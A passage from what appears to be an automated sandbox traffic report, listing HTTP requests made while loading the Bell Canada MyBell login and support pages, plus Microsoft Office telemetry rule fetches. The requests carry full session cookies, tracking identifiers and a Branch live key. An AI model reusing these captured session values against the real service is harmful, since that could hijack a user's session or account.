TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; rxvt=1730382139586|1730380318420; dtPC=8$580338487_402h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; da_sid=84E654F18AD2AE89A6
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; rxvt=1730382139586|1730380318420; dtPC=8$580338487_402h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; da_lid=B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_intState=; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js?render=6LeHfTIaAAAAAE8TkvlCBFUqP7E52VxL6ZQnqjli&onload=onloadCallback HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=e8acc2285415480dbbf54ad6f854a96e.37_0&mboxPage=b690d05597134b3087af7cf5ef75c06e&mboxRid=4cf59d2eb9664c44a588099a000084b2&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365948984&mboxHost=mybell.bell.ca&mboxURL=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=1998BC1DA4CB7CA3-5F625B5BF750FFBD&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1Host: somni.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mybell.bell.caSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C264046902409987471242741560364523790
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ecm3?ex=adobe.com&id=26594250982175076714259318767746782479 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A416tCsuyE62q0ke3351vrU; ad-privacy=0
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/anchor?ar=1&k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP&co=aHR0cHM6Ly9teWJlbGwuYmVsbC5jYTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=vbt35wilmbgr HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZxfxzYBwcz7Gnvqu3Y83ZbiHyue1AJYczF16kXnMrYQu4vUb1Eg9Z0jpwvMDzXecLZHMeVchD3odA4owgc
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__2 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__3 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/953414520/?random=1730380345423&cv=11&fst=1730380345423&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /b/ss/bellca/10/JS-2.22.0-LEWM/s08712474510957?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=31%2F9%2F2024%209%3A12%3A25%204%20240&d.&nsid=0&jsonv=1&.d&sdid=03870B84460DADFF-291E557ADEB59CD2&mid=26404690240998747124274156036452379072&aamlh=6&ce=UTF-8&cdp=2&pageName=Login&g=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&c.&di_session_id_ms=0.00&di_launch_lib_ms=14123.70&di_session_id=di-693653-84E654F18AD2AE89A616AA13A6B4CC6A8F&.c&cc=CAD&ch=Login&server=xdqn9denqtys%2F4vqsiohi0zc%2B409oxcu1obi2gvjxyy%3D&events=event1%2Cevent19%2Cevent39%2Cevent83%2Cevent151&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=false&v3=false&c6=D%3Dv135&c9=Login&c10=D%3Dv46&c12=D%3Dv3&c13=D%3Dv31&c14=https%3A%2F%2Fmybell.bell.ca%2Flogin&v14=D%3Dv13&c16=D%3Dv18&c21=D%3Dv21&v21=en-on&v23=759a09cf-47c2-3ce7-804c-25098e01ffa8&v29=D%3Dv25&v30=001&c32=D%3Dv2&v32=26404690240998747124274156036452379072&c33=Login&c36=D%3Dv36&v36=Thursday-9%3A00AM&c37=D%3Dv37&v37=1&c44=D%3Dv102&c45=No%20Referrer&v46=Login&c50=LAUNCH%5Bproduction%20Published%20on%3A%202024-10-29T16%3A55%3A46Z%5D&v51=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&c55=D%3Dv77&c57=D%3Dv30&c58=D%3Dv60&v64=dock%20is%20not%20present%3Ai&c65=2024-10-31%2C09%3A12%3A24.002%2C2024-10-31%2C09%3A11%3A53.540&v67=e60da217-072c-41c7-969e-7adbf82ba8be%3A759a09cf-47c2-3ce7-804c-25098e01ffa8&c68=Login&c70=D%3DUser-Agent&c73=D%3Dv17&c75=Login&v75=D%3DUser-Agent&v77=001-1-0&v103=Launch%20%7Casync&v136=User&v145=Page%20load&v151=di-693653-84E654F18AD2AE89A616AA13A6B4CC6A8F&v160=074d78d6-7e50-4974-a9af-c4727a62784e&v162=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23&v179=not%20available&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=48B034FA53CF9FD10A490D44%40AdobeOrg&AQE=1 HTTP/1.1Host: data1.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A;
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /s/player/78fcc867/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=dguaeE1ndQQ; VISITOR_INFO1_LIVE=GLrlnw2kTbI; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJQ%3D%3D
Source: global trafficHTTP traffic detected: GET /i/14028/693653/c.json HTTP/1.1Host: collection.decibelinsight.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://support.bell.caSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3If-None-Match: W/012546114-192E2B478BB
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://support.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcObIf-None-Match: W/"5b-5gxRPCEPhFM2aFWOY0O0uslI6Hg"
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
